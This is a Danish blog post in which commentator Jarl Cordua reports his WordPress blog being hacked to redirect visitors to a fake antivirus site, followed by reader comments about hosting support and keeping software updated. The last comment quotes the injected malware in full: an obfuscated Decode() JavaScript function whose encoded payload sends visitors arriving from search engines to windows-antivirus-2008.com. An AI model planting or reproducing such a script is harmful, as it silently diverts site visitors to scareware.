Kategorier

jarlcordua.dk hacket

Så skete det også for mig. Min blog blev hacket torsdag morgen. Det var ikke en skidebehagelig oplevelse. For at sige det mildt.

Computer-sitet CRN skrev endda om sagen:

Førende blogger hacket af malware-side

“Flere danske websteder er blevet hacket og videresender brugerne til en malware-side med falske sikkerheds-programmer. En af landets førende politiske bloggere er blandt ofrene”

Læs hele historien her.

“Førende blogger”. Det smager da lidt af fugl. Som Simon Spies sagde: Al presse er god presse! 😉

Var der tale om et venstreorienteret attack? Formentlig ikke. Det viser sig at en række såkaldte WordPress-blogs er blevet hacket worldwide.

Hurra til Lasse Birk Olesen (Oles lillebror) som sprang til og senere hjalp mig ud af suppedasen, sådan at Jarls Blog er oppe igen!

Lige et tip: Min udbyder firmaet “One.com” var ikke til meget hjælp. Det er ikke nogen, som jeg kan anbefale andre. De bad mig blot om at fjerne alt for så at starte forfra.

Her er min oplevelse formuleret på pidgin-dansk:

“Jeg sende penge hvert år til firmaet one.com. En dag jeg have problem. Jeg skrive til one.coms “support” (telefon findes ikke) One.com skrive de ikke kan hjælpe. Jeg klage. One.com. slå ud med armene: Ikke vores problem. Jeg fucking pissed”

Update mandag den 21.7 sitet Comon følger op på historien.

Af Jarl Cordua

Jarl Cordua

cand.polit, radiovært samt politisk kommentator. Vært på det politiske TV-program "Borgen Late Night", der sendes hver tirsdag. Tidligere skri ent på Jarls Blog og medvært på "Cordua & Steno"
Født 1969 i Rønne. Bor i Hellerup.
Kontaktoplysninger: jarlATjarlcordua.dk Telefon: 31718718

23 kommentarer til “jarlcordua.dk hacket”

Det kunne have været værre… I det mindste var der ikke billeder af dig, med tilfældige nøgne rockere klippet ind.

Det er pisse surt at blive hacket.. jeg har nogle år på bagen i web-branchen og har set en håndfuld angreb, og det er lige surt hver gang.

Men at pege fingre af one.com (eller en hvilken som helst anden udbyder i “forbruger” kategorien, inkl. unoeuro) er ikke fair. Det svarer til at give gasselskabet skylden for at din bøf brænder på. Det er ganske enkelt ikke den service du har købt.

En lille teknisk note: Kigger jeg på kildekoden, står der, at du kører WordPress 2.1.3.

Det er en ældre sag, og hvis det passer, kan det i så fald være en idé at opgradere til 2.5.1 eller 2.6 (jeg er næsten totalt kode-analfabet, men opgraderinger omfatter som regel også sikkerhedsopdateringer, så det er klogt at holde sig opdateret)

😉

5. Ja. Det er skideirriterende at man skal bruge tid på al mulig teknisk fis, når man egentlig hellere vil skrive om politik.

But I’ve learned my lesson. Jeg må nu bruge mere af min tid på det, som jeg finder er røvsygt. Men alt for læserne!

Hvis du ikke vil bøvle med det tekniske, hvorfor så ikke have bloggen liggende på wordpress.com, blogger.com, livejournal.com, typepad.com eller tilsvarende — altså udlicitere bøvlet?

Det er ikke webhotellets ansvar at redde dig ud af suppedasen, når/hvis du bliver hacket, men helt og holdent din egen.

Derfor er der jo kun for webhotellet at sige “forfra, desværre”, hvis du absolut vil spørge dem om hjælp.

Det er vigtigt at vide, på samme måde som når/hvis ens computer bliver inficeret, hvad man skal gøre, ellers skal man holde sig fra at drive et website.

Når din bil går i stykker, går man til en mekaniker. Hvis du ikke selv kan reparere dit website, så bør du jo have en leverandør i baghånden. Der er *ingen* webhoteller, der tilbyder som udgangspunkt at stå for at redde dig ud af suppedasen når/hvis du bliver hacket.

Jeg kan godt se, at det er nemmere at brokke sig over webhotellet end at se indad først.

Iøvrigt har du heller ikke sørget for at holde dig opdateret med sikkerhedsopdateringer til WordPress etc. – så er det jo klart, at man nærmest beder om at blive hacket !

Gentager: Det er for svagt bare at skyde skylden på manglende fejlrettelse på dit webhotel, fejlen ligger hos dig.

Og endelig skriver du, at du sender penge til one.com – ja, de 9 kroner + moms du giver hver måned er da mindre, end du drikker sodavand for, mens du læser disse kommentarer.

Hvordan kan du forvente at have webhotel, email, email support (på det man kan forvente support på) – og så kritisere webhotellet.

At one.com er et dårligt webhotel, kan vi hurtigt blive enige om, men det er altså noget med, hvilke forventninger man med rimelighed kan stille til sit webhotel, og der har du godt nok fuldstændigt misforstået situationen, ven !…

8-10

Jeg noterer mig dine belæringer.

“Det er vigtigt at vide, på samme måde som når/hvis ens computer bliver inficeret, hvad man skal gøre, ellers skal man holde sig fra at drive et website.”

Jeg er fuldstændig uenig med dig. Jeg må kunne forvente et MINIMUM af vejledning. Det har one.com i øvrigt også indrømmet.

Men jeg vil give dig så meget, at det er et wakeup-call for en IT-amatør som mig mht at få opdateret min sikkerhed.

Hvorfor bruger du egentlig ikke bare One.com’s eget rigtig gode blogmodul?

Du kan jo ikke forvente, at de kan supportere tredepartssoftware, men jeg har aldrig haft problemer med support på deres blogmodul.

Umiddelbart er jeg meget enig med Morten (8-10) i hans anskuelser, men hele branchen burde nu også få sat mere fokus på bedre kundeservice og ryddet op i procedurer og betingelser.

Jeg har været hos One og oplevet nogenlunde samme behandling – med ulovlige bindingsperioder. Siden har jeg været hos Surftown, som har ændret meget på forretningen og er blevet rigtigt gode.

Du kan btw få 3 mdr. gratis WordPress hos dem 😉
http://www.surftown.dk/?docid=0EEB6105-29D2-4F18-BD4D-F99812345BB7

Jarl (11.) – belæringer er vel så meget sagt, bare mere en IT/web nørds tanker om din indstilling til teknik & webhotellers supportmuligheder 🙂

Minimum af vejledning – > det fik du faktisk. Hvis du ikke har teknisk kunnen til at kunne rydde op efter et hacker angreb, bør du slette alle filer og starte forfra (eller fra en backup). Det var vel det (skriver du selv) at du fik at vide. Så du *fik* jo faktisk vejledning.

Det *kræver* teknisk kunnen at rydde op efter et hackerangreb. Man skal være *sikker !* på at der ikke ligger noget tilbage, som kan bruges senere af hackeren/det automatiserede angreb.

Wake-up call. -> Ja, enig, man bliver i den grad kaffe-vågen når man har været angrebet. Har selv ryddet op i 30-40 sites (på een gang!) efter hacker angreb (har den fornødne tekniske viden selv).

Bluehost har en automatisk WOrdpress-installation, som bliver opdateret og vedligeholdt uden at man skal gøre det store selv.

Men jeg ved ikke om de tager .dk-domæner.

Hej Jarl.

Kunne du ikke bare have fulgt oc henstillingen, og have gen-indsat kopier af dine utvivlsomt sikkerhedskopierede filer?

Nu, du lever af at ytre dig, har du vel løbende gemt et ekstra-sæt af alle perlerne et sted i cyberspace

Det koster kun et tryk på en en tast.

Og så er der ikke mere grund til højlydt it-jammer, højst lidt ærgelse i ny og næ

vh

ns

Så er den nede igen. Det kan undgås, hvis man trykker ESC, når siden er loadet.

Hmm… Firefox 3 på OS X.5 bliver stadig videresendt til en anden side.

Er det ikke den her, som ikke burde være der?

function Decode(){var temp=””,i,c=0,out=””;var str=”60!115!99!114!105!112!116!62!10!118!97!114!32!114!101!102!101!114!114!101!114!32!61!32!83!116!114!105!110!103!40!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!41!46!116!111!76!111!119!101!114!67!97!115!101!40!41!59!10!118!97!114!32!117!114!108!115!32!61!32!110!101!119!32!65!114!114!97!121!40!41!59!10!117!114!108!115!46!112!117!115!104!40!34!97!115!107!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!103!111!111!103!108!101!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!109!115!110!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!108!105!118!101!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!97!111!108!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!97!108!116!97!118!105!115!116!97!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!101!120!99!105!116!101!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!121!97!104!111!111!46!99!111!109!34!41!59!10!102!111!114!32!40!118!97!114!32!105!61!48!59!32!105!60!117!114!108!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!10!105!102!32!40!83!116!114!105!110!103!40!114!101!102!101!114!114!101!114!41!46!115!101!97!114!99!104!40!117!114!108!115!91!105!93!41!32!33!61!32!45!49!41!32!123!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!39!60!109!101!116!97!32!104!116!116!112!45!101!113!117!105!118!61!34!114!101!102!114!101!115!104!34!32!99!111!110!116!101!110!116!61!34!48!59!117!114!108!61!104!116!116!112!58!47!47!119!105!110!100!111!119!115!45!97!110!116!105!118!105!114!117!115!45!50!48!48!56!46!99!111!109!47!34!62!39!41!59!10!98!114!101!97!107!59!10!125!125!10!60!47!115!99!114!105!112!116!62!32!”;l=str.length;while(c<=str.length-1){while(str.charAt(c)!=’!’)temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp=””;}document.write(out);}

Lukket for kommentarer.